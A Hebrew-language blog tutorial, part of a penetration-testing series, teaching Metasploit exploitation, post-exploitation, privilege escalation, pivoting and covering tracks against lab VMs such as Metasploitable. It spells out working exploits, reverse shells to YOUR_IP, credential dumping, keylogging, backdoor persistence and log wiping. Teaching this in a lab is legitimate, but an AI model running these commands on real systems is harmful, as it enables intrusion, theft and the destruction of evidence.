תפריט
דף הבית מאמרים {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} אודות עבדו איתי
Cybersecurity concept visualization
אבטחה מרץ 8, 2026 • 28 דקות קריאה

Exploitation: From Vulnerability to Shell

Master Metasploit Framework, exploit real vulnerabilities, escalate privileges, and pivot through networks. The complete guide to ethical exploitation techniques.

שתפו:
Lee Foropoulos

Lee Foropoulos

28 דקות קריאה

Continue where you left off?
Text size:

Contents

הנתיב של ההאקר: סדרה בת 5 חלקים

חלק 1: מבואחלק 2: שליטה ב-Flipperחלק 3: יסודות Kaliחלק 4: Exploitationחלק 5: הביקורת המלאה

בחלקים 1-3, בניתם את ארגז הכלים שלכם. אתם יכולים לשכפל תגים, למפות רשתות, ללכוד handshakes ולזהות כל שירות שרץ על מטרה. אתם רואים פגיעויות בכל מקום עכשיו. אבל לראות פגיעות ולנצל אותה הן מיומנויות שונות מאוד.

כאן הדברים נהיים אמיתיים. היום תלמדו להשתמש ב-Metasploit Framework, אותו כלי שמשתמשים בו בודקי חדירה מקצועיים ברחבי העולם. תנצלו את הפגיעות הראשונה שלכם, תבססו persistence, תסלימו הרשאות ותלמדו לעשות pivot דרך רשת.

הקו שאסור לחצות

הכל במאמר הזה חייב להיות מתורגל על מערכות שבבעלותכם או שיש לכם אישור כתוב מפורש לבדוק. גישה לא מורשית למערכות מחשב היא עבירה פדרלית שנושאת עונשים של עד 20 שנות מאסר. "רק למדתי" אינה הגנה. בנו מעבדה, השתמשו ב-VMs פגיעים במכוון, ולעולם אל תיגעו במערכות שאינן שלכם.

חלק 1: בניית מעבדת ההתקפה

לפני שמנצלים משהו, אתם צריכים מטרות. בודקי חדירה אמיתיים משתמשים בסביבות מעבדה מבודדות עם מכונות פגיעות במכוון. אתם תעשו את אותו הדבר.

ההתקנה הבסיסית של המעבדה

מה תצטרכו

  • Kali Linux VM - מכונת ההתקפה שלכם (מחלק 3)
  • Metasploitable 2 - VM של Linux פגיע במכוון (SourceForge)
  • Metasploitable 3 - VM פגיע של Windows/Linux (GitHub)
  • DVWA - Damn Vulnerable Web Application (GitHub)
  • VulnHub VMs - מכונות פגיעות בסגנון CTF (vulnhub.com)

פרויקט: הקמת רשת מעבדה

זמן: 45 דקות

  1. הורידו את Metasploitable 2 מ-SourceForge
  2. ייבאו ל-VirtualBox/VMware
  3. הגדירו רשת: הגדירו גם את Kali וגם את Metasploitable ל-"Host-Only" או "Internal Network"
  4. אתחלו את Metasploitable (התחברות ברירת מחדל: msfadmin / msfadmin)
  5. רשמו את כתובת ה-IP: ifconfig
  6. מ-Kali, אמתו קישוריות: ping METASPLOITABLE_IP
  7. הריצו סריקה ראשונית: sudo nmap -sV -sC METASPLOITABLE_IP

אימות: אתם צריכים לראות עשרות פורטים פתוחים. Metasploitable מתוכנן להיפרץ.

סריקת ה-nmap של Metasploitable צריכה לחשוף שירותים כמו FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL ועוד, רבים מהם מריצים גרסאות מיושנות ופגיעות. זה מגרש המשחקים שלכם.

חלק 2: יסודות Metasploit Framework

Metasploit הוא לא סתם כלי. הוא מערכת אקולוגית שלמה. הוא מכיל אלפי exploits, payloads, מודולים עזר וכלי post-exploitation. הבנת המבנה שלו היא חיונית.

4,000+
מודולי exploit זמינים ב-Metasploit Framework, המכסים כל פלטפורמה מרכזית וקטגוריית פגיעויות.

הפעלת Metasploit

bash
1# Initialize the database (first time only)
2sudo msfdb init
3
4# Start Metasploit console
5msfconsole
6
7# You'll see the Metasploit banner and prompt:
8msf6 >

מבנה Metasploit

Metasploit מארגן הכל במודולים:

  • Exploits - קוד שמנצל פגיעויות
  • Payloads - קוד שרץ אחרי ה-exploitation (shells, meterpreter)
  • Auxiliary - סורקים, fuzzers וכלי עזר אחרים
  • Post - מודולי post-exploitation עבור persistence, pivoting
  • Encoders - ערפול payloads כדי להתחמק מזיהוי
bash
1# Search for modules
2msf6 > search type:exploit platform:linux smb
3
4# Search by CVE
5msf6 > search cve:2017-0144
6
7# Search by name
8msf6 > search vsftpd
9
10# Get info about a module
11msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

תהליך העבודה של Exploitation

כל exploitation ב-Metasploit עוקב אחר אותו תבנית:

  1. בחרו exploit - use exploit/path/to/module
  2. הגדירו אפשרויות - IP של המטרה, פורטים, credentials
  3. בחרו payload - מה רץ אחרי ה-exploitation
  4. הפעילו - exploit או run
Cybersecurity operations with code on multiple screens
ה-Metasploit Framework מספק גישה מובנית ל-exploitation, והופך מחקר פגיעויות לתהליכי עבודה מקצועיים שניתנים לחזרה.

חלק 3: ה-Exploit הראשון שלכם

בואו ננצל אחד מה-backdoors המפורסמים ביותר בהיסטוריה: ה-vsftpd 2.3.4 backdoor. ב-2011, מישהו הכניס backdoor לקוד המקור של vsftpd. אם שולחים שם משתמש שמסתיים ב-:), נפתח shell בפורט 6200.

Metasploitable 2 מריץ בדיוק את הגרסה הזו.

bash
1# Start Metasploit
2msfconsole
3
4# Search for the exploit
5msf6 > search vsftpd
6
7# Select the exploit
8msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
9
10# View required options
11msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
12
13# Set the target
14msf6 exploit(...) > set RHOSTS 192.168.56.101
15
16# Run the exploit
17msf6 exploit(...) > exploit
18
19# If successful:
20[*] Command shell session 1 opened
21[+] Got shell!
22
23# You now have a root shell on the target
24whoami
25root
26id
27uid=0(root) gid=0(root)

זהו. שירות פגיע אחד, exploit אחד, גישת root. בגלל זה חשוב לעדכן תוכנה.

שירות פגיע אחד, exploit אחד, גישת root. בגלל זה חשוב לעדכן תוכנה.

פרויקט: ניצול ה-vsftpd Backdoor

זמן: 15 דקות

דרישות קדם: Metasploitable 2 פועל, Kali באותה רשת

  1. אמתו ש-FTP רץ: nmap -sV -p 21 TARGET_IP
  2. הפעילו את msfconsole
  3. חפשו, בחרו והגדירו את ה-vsftpd exploit
  4. הריצו את ה-exploit
  5. ברגע שיש לכם shell, חקרו: cat /etc/shadow

קריטריונים להצלחה: אתם יכולים לקרוא את /etc/shadow, שרק root יכול לגשת אליו.

חלק 4: הבנת Payloads

Payload הוא מה שרץ אחרי שה-exploit מצליח. ה-shell הבסיסי שקיבלנו למעלה הוא פשוט, אבל Metasploit מציע אפשרויות הרבה יותר חזקות.

סוגי Payloads

  • Singles - payloads עצמאיים, חד-פעמיים (הוספת משתמש, הרצת פקודה)
  • Stagers - payloads קטנים שיוצרים חיבור, ואז מורידים את ה-payload הראשי
  • Stages - ה-payload הראשי שה-stager מוריד (Meterpreter)
bash
1# List compatible payloads for current exploit
2msf6 exploit(...) > show payloads
3
4# Set a specific payload
5msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
6
7# Payload naming convention:
8# platform/arch/payload_type/connection_type
9# linux/x86/meterpreter/reverse_tcp
10# windows/x64/shell/bind_tcp

Reverse מול Bind Shells

  • Reverse shell - המטרה מתחברת חזרה אליכם. עדיף לעקיפת firewalls (תעבורה יוצאת בדרך כלל מותרת).
  • Bind shell - המטרה פותחת פורט שתתחברו אליו. קל יותר לזיהוי, לעתים קרובות נחסם על ידי firewalls.
bash
1# For reverse shells, you must set your IP
2msf6 exploit(...) > set LHOST YOUR_KALI_IP
3msf6 exploit(...) > set LPORT 4444
4
5# Metasploit starts a listener automatically when you exploit

Meterpreter: ה-Payload האולטימטיבי

Meterpreter הוא ה-payload החזק ביותר של Metasploit. הוא רץ לגמרי בזיכרון (ללא קבצים על הדיסק), מספק תקשורת מוצפנת וכולל עשרות פקודות מובנות ל-post-exploitation.

bash
1# Meterpreter commands (once you have a session)
2meterpreter > sysinfo          # System information
3meterpreter > getuid           # Current user
4meterpreter > pwd              # Current directory
5meterpreter > ls               # List files
6meterpreter > download file    # Download file to Kali
7meterpreter > upload file      # Upload file to target
8meterpreter > shell            # Drop to system shell
9meterpreter > hashdump         # Dump password hashes
10meterpreter > screenshot       # Take screenshot
11meterpreter > keyscan_start    # Start keylogger
12meterpreter > keyscan_dump     # Dump keystrokes
13meterpreter > background       # Background this session

חלק 5: טכניקות Exploitation נוספות

ניצול Samba (SMB)

Metasploitable 2 מריץ גרסה פגיעה של Samba. זה דומה ל-exploit המפורסם EternalBlue שנוצל ב-WannaCry.

bash
1# Search for Samba exploits
2msf6 > search type:exploit samba
3
4# The "username map script" vulnerability
5msf6 > use exploit/multi/samba/usermap_script
6msf6 exploit(...) > set RHOSTS TARGET_IP
7msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
8msf6 exploit(...) > set LHOST YOUR_IP
9msf6 exploit(...) > exploit
10
11[*] Command shell session 2 opened

ניצול Credentials חלשים

לא כל פריצה דורשת פגיעות בתוכנה. סיסמאות חלשות נמצאות בכל מקום.

bash
1# SSH brute-force auxiliary module
2msf6 > use auxiliary/scanner/ssh/ssh_login
3msf6 auxiliary(...) > set RHOSTS TARGET_IP
4msf6 auxiliary(...) > set USERNAME root
5msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
6msf6 auxiliary(...) > set STOP_ON_SUCCESS true
7msf6 auxiliary(...) > run
8
9# For known credentials
10msf6 > use auxiliary/scanner/ssh/ssh_login
11msf6 auxiliary(...) > set USERNAME msfadmin
12msf6 auxiliary(...) > set PASSWORD msfadmin
13msf6 auxiliary(...) > run
14
15[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

ניצול יישומי Web

Metasploitable כולל מספר יישומי web פגיעים. בואו ננצל PHP code injection.

bash
1# First, browse to http://TARGET/mutillidae/
2# Find the "User Lookup" page (vulnerable to SQLi and code injection)
3
4# Use Metasploit's web exploits
5msf6 > search type:exploit php
6
7# Or exploit manually with command injection:
8# In vulnerable input field:
9; cat /etc/passwd
10; nc -e /bin/bash YOUR_IP 4444

פרויקט: ניצול שלושה שירותים שונים

זמן: 60 דקות

מטרה: Metasploitable 2

  1. נצלו את ה-vsftpd backdoor (FTP - פורט 21) וקבלו root shell
  2. נצלו את Samba usermap_script (SMB - פורט 139/445) וקבלו root shell
  3. פצחו SSH credentials (פורט 22) באמצעות auxiliary/scanner/ssh/ssh_login
  4. תעדו כל exploitation: מודול שנוצל, אפשרויות שהוגדרו, תוצאה

בונוס: חקרו את יישומי ה-web בפורט 80 ומצאו וקטורי exploitation ידניים.

חלק 6: Post-Exploitation

קבלת shell היא רק ההתחלה. בדיקות חדירה אמיתיות דורשות הדגמה של מה שתוקף יכול לעשות עם הגישה הזו. זה post-exploitation.

איסוף מידע

text
1# From a Meterpreter session
2meterpreter > sysinfo
3Computer    : metasploitable
4OS          : Linux 2.6.24
5Architecture: i686
6Meterpreter : x86/linux
7
8# Network information
9meterpreter > ipconfig
10meterpreter > route
11meterpreter > arp
bash
1# From a regular shell
2cat /etc/passwd       # All users
3cat /etc/shadow       # Password hashes (requires root)
4cat /etc/hosts        # Network mappings
5netstat -tulpn        # Open ports
6ps aux                # Running processes
7crontab -l            # Scheduled tasks

קצירת Credentials

text
1# Dump password hashes
2meterpreter > hashdump
3root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
4msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash
bash
1# Or from shell
2cat /etc/shadow
3
4# Crack hashes offline with John the Ripper
5john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
6
7# Or hashcat (faster with GPU)
8hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

ביסוס Persistence

Persistence פירושו שמירה על גישה גם אחרי אתחולים מחדש או כשהווקטור הראשוני של ה-exploit תוקן.

bash
1# Add a new user with sudo access
2useradd -m -s /bin/bash hacker
3echo "hacker:password123" | chpasswd
4usermod -aG sudo hacker
5
6# Add SSH key for passwordless access
7mkdir /home/hacker/.ssh
8echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
9
10# Cron-based reverse shell (reconnects every minute)
11echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
12
13# Metasploit persistence module
14meterpreter > run persistence -h
15meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

Persistence = ראיות

כל מנגנון persistence משאיר עקבות. בבדיקת חדירה אמיתית, אתם מתעדים מה יכולתם לעשות, ואז מנקים. השארת backdoors במערכות של לקוחות היא לא מקצועית ואולי אף בלתי חוקית. במעבדה שלכם, תשתוללו, אבל הבינו את ההשלכות.

חלק 7: הסלמת הרשאות

לעתים קרובות מקבלים גישה ראשונית כמשתמש עם הרשאות נמוכות. הסלמה ל-root/admin נדרשת בדרך כלל כדי להשיג את מטרות הבדיקה.

הסלמת הרשאות ב-Linux

bash
1# Current user context
2id
3whoami
4
5# SUID binaries (run as owner regardless of who executes)
6find / -perm -4000 -type f 2>/dev/null
7
8# World-writable directories
9find / -writable -type d 2>/dev/null
10
11# Sudo permissions
12sudo -l
13
14# Kernel version (for kernel exploits)
15uname -a
16
17# Running processes as root
18ps aux | grep root
19
20# Cron jobs
21cat /etc/crontab
22ls -la /etc/cron.*

סקריפטים אוטומטיים לאיסוף מידע

bash
1# Upload and run LinPEAS
2# From Kali, host the script:
3python3 -m http.server 8000
4
5# From target:
6wget http://YOUR_IP:8000/linpeas.sh
7chmod +x linpeas.sh
8./linpeas.sh
9
10# LinPEAS highlights potential vectors in colors:
11# RED/YELLOW = Critical findings, likely exploitable

וקטורי Privesc נפוצים ב-Linux

bash
1# 1. Sudo misconfiguration
2sudo -l
3# If you see: (ALL) NOPASSWD: /usr/bin/vim
4sudo vim -c '!sh'
5# Instant root shell
6
7# 2. SUID binary exploitation
8# If /usr/bin/find has SUID bit:
9find . -exec /bin/sh -p \;
10
11# 3. Writable /etc/passwd
12# Generate password hash:
13openssl passwd -1 mypassword
14# Add to /etc/passwd:
15echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
16
17# 4. Cron job exploitation
18# If a cron runs a writable script as root:
19echo 'chmod +s /bin/bash' >> /path/to/cron/script
20# Wait for cron, then:
21/bin/bash -p
22# Root shell

הסלמת הרשאות ב-Windows

אם אתם בודקים מטרות Windows (Metasploitable 3), הטכניקות שונות:

text
1# From Meterpreter on Windows
2meterpreter > getuid
3Server username: VICTIM\lowpriv_user
4
5meterpreter > getsystem
6[+] ...got SYSTEM
7
8# If getsystem fails, try:
9meterpreter > run post/multi/recon/local_exploit_suggester
10
11# Or background and use specific exploit:
12meterpreter > background
13msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
14msf6 exploit(...) > set SESSION 1
15msf6 exploit(...) > exploit

פרויקט: הסלמה ממשתמש ל-Root

זמן: 45 דקות

תרחיש: יש לכם גישת SSH ל-Metasploitable כ-msfadmin (ללא root)

  1. SSH ל-Metasploitable: ssh msfadmin@TARGET
  2. הריצו id כדי לאשר שאתם לא root
  3. בדקו הרשאות sudo: sudo -l
  4. חפשו SUID binaries: find / -perm -4000 2>/dev/null
  5. העלו והריצו LinPEAS
  6. זהו וקטור privesc ונצלו אותו

מטרה: קבלו root shell באמצעות משהו שאינו ניצול שירות רשת.

Hacker working on code in a dark environment
הסלמת הרשאות הופכת גישה מוגבלת לשליטה מלאה במערכת, לעתים קרובות דרך הגדרות שגויות שהתעלמו מהן ולא דרך exploits מתוחכמים.

חלק 8: Pivoting

Pivoting הוא שימוש במערכת שנפרצה כדי לתקוף מערכות אחרות שאינן נגישות ישירות ממכונת ההתקפה שלכם. כך תוקפים נעים לרוחב ברשתות.

תרחיש ה-Pivot

דמיינו את הרשת הזו:

  • ה-Kali שלכם: 192.168.1.100
  • Host שנפרץ: 192.168.1.50 (מחובר גם לרשת פנימית 10.0.0.0/24)
  • מטרה: 10.0.0.10 (נגיש רק מ-192.168.1.50)

אתם לא יכולים להגיע ל-10.0.0.10 ישירות. אבל דרך ה-host שנפרץ, אתם יכולים.

ניתוב Metasploit

text
1# After getting a Meterpreter session on the pivot host
2meterpreter > ipconfig
3# Shows two interfaces: 192.168.1.50 and 10.0.0.50
4
5meterpreter > run autoroute -s 10.0.0.0/24
6[+] Added route to 10.0.0.0/24 via session 1
7
8meterpreter > background
9
10# Now Metasploit routes 10.0.0.0/24 traffic through session 1
11msf6 > route print
12
13# Scan the internal network
14msf6 > use auxiliary/scanner/portscan/tcp
15msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
16msf6 auxiliary(...) > set PORTS 22,80,443,445
17msf6 auxiliary(...) > run
18
19# Exploit internal targets through the pivot
20msf6 > use exploit/windows/smb/ms17_010_eternalblue
21msf6 exploit(...) > set RHOSTS 10.0.0.10
22msf6 exploit(...) > exploit

SOCKS Proxy לגישה מלאה

bash
1# Set up a SOCKS proxy through Meterpreter
2msf6 > use auxiliary/server/socks_proxy
3msf6 auxiliary(...) > set SRVPORT 1080
4msf6 auxiliary(...) > run
5
6# Configure proxychains (/etc/proxychains4.conf)
7socks5 127.0.0.1 1080
8
9# Now any tool can access the internal network
10proxychains nmap -sT -Pn 10.0.0.10
11proxychains curl http://10.0.0.10
12proxychains ssh [email protected]

SSH Tunneling (ללא Metasploit)

bash
1# Dynamic port forwarding (SOCKS proxy)
2ssh -D 1080 user@pivot_host
3
4# Local port forwarding (specific port)
5ssh -L 8080:10.0.0.10:80 user@pivot_host
6# Now localhost:8080 reaches 10.0.0.10:80
7
8# Remote port forwarding (expose your service to internal network)
9ssh -R 4444:localhost:4444 user@pivot_host
10# Internal hosts can reach your port 4444 via pivot_host:4444

חלק 9: כיסוי עקבות

בודקי חדירה מקצועיים מתעדים את הגישה שלהם אבל מנקים אחריהם. הבנת איך תוקפים מכסים עקבות עוזרת גם בזיהוי חדירות.

bash
1# Clear bash history
2history -c
3cat /dev/null > ~/.bash_history
4
5# Clear auth logs (requires root)
6echo "" > /var/log/auth.log
7echo "" > /var/log/wtmp
8echo "" > /var/log/btmp
9
10# Remove specific log entries
11sed -i '/YOUR_IP/d' /var/log/auth.log
12
13# Timestomp (change file timestamps)
14touch -r /etc/passwd /path/to/your/file
15
16# Meterpreter
17meterpreter > clearev          # Clear Windows event logs
18meterpreter > timestomp file -m "01/01/2020 12:00:00"

בהתקשרויות אמיתיות: אל תעשו את זה

בודקי חדירה מקצועיים מתעדים את הגישה שלהם ומדווחים על הממצאים שלהם. הם לא מסתירים אותם. ניקוי לוגים הורס ראיות שהמגנים צריכים כדי להבין את נתיב ההתקפה. תרגלו טכניקות אלו רק בסביבת המעבדה המבודדת שלכם.

הנתיב של ההאקר

סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.

חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali חלק 4: Exploitation ✓ חלק 5: ביקורת מלאה

רשימת בדיקה לחלק 4

☐ הקמת מעבדה: Metasploitable 2 פועל, רשת מבודדת מוגדרת

☐ Metasploit: מסד נתונים מאותחל, ניווט בסיסי נשלט

☐ Exploit ראשון: vsftpd backdoor נוצל, root shell הושג

☐ וקטורים מרובים: FTP, SMB נוצלו ו-SSH credentials נפרצו

☐ Post-Exploitation: password hashes חולצו, מערכת נסרקה

☐ הסלמת הרשאות: הסלמה ממשתמש ל-root ללא network exploit

☐ Pivoting: הבנת מושגי autoroute ו-SOCKS proxy

☐ תיעוד: כל ה-exploits תועדו עם שלבים וראיות

תוכנית פעולה למיומנויות Exploitation 0/5

מה הלאה

למדתם לנצל פגיעויות, להסלים הרשאות ולעשות pivot ברשתות. ראיתם כמה מהר חולשה אחת הופכת לפריצה מוחלטת. אתם מבינים מה בודקי חדירה מקצועיים עושים.

בחלק 5, אנחנו מחברים הכל יחד. תבצעו ביקורת אבטחה מלאה מההתחלה ועד הסוף:

  • הגדרת היקף וכללי התקשרות
  • מתודולוגיית סיור מלאה
  • exploitation שיטתי
  • post-exploitation מקיף
  • דיווח מקצועי
  • המלצות לתיקון

חלק 5 הוא השיא. הכל שלמדתם לאורך הסדרה הזו מתחבר למתודולוגיית עולם אמיתי שתוכלו להשתמש בה כדי להעריך את האבטחה של כל רשת שאתם מורשים לבדוק.

למדתם את הטכניקות. עכשיו אתם לומדים את המתודולוגיה. חלק 5 הופך מיומנויות לתהליך עבודה מלא של בדיקות חדירה.

נתראה בחלק 5.

How was this article?

שתפו

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Al tachmits af post

Qabel hodaot keshemashmim maamarim chadashim. Lo dorshim email.

Tire banner baatar keshemashmim maamar chadash, vetodaa medafdefan im teashru.

Hodaot defdefan bilvad. Beli spam, beli email.

0 / 0